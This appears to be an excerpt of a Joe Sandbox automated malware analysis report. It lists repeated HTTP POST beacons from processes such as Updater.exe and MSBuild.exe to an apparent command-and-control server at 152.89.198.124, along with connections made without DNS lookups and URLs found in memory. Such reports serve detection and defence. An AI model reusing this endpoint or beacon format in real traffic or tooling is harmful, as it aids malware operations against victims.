Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1

Source: Joe Sandbox View

IP Address: 152.89.198.124 152.89.198.124

Source: Joe Sandbox View

ASN Name: NEXTVISIONGB NEXTVISIONGB

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.126.163
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.126.163
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown	TCP traffic detected without corresponding DNS query: 152.89.198.124

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0074D935 InternetReadFile,SetEvent,GetLastError,SetEvent,

35_2_0074D935

Source: unknown

HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.php
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phped
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phpp
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cscasha2.ocsp-ce
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.us
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
